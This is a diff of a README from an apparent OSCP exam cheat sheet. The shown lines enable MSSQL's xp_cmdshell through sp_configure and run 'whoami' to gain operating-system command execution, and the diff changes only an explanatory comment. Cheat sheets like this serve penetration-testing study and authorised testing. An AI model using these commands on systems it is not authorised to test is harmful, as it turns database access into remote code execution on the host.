redcountryroad/OSCP-shortsheet/README.md

 RECONFIGURE;
 EXECUTE sp_configure 'xp_cmdshell', 1;
 RECONFIGURE;
-#Now we can run commands
+# with xp_cmdshell enabled, we can execute any Windows shell command through the EXECUTE statement
 EXECUTE xp_cmdshell 'whoami';

 #Sometimes we may not have direct access to convert it to RCE from web, then follow below steps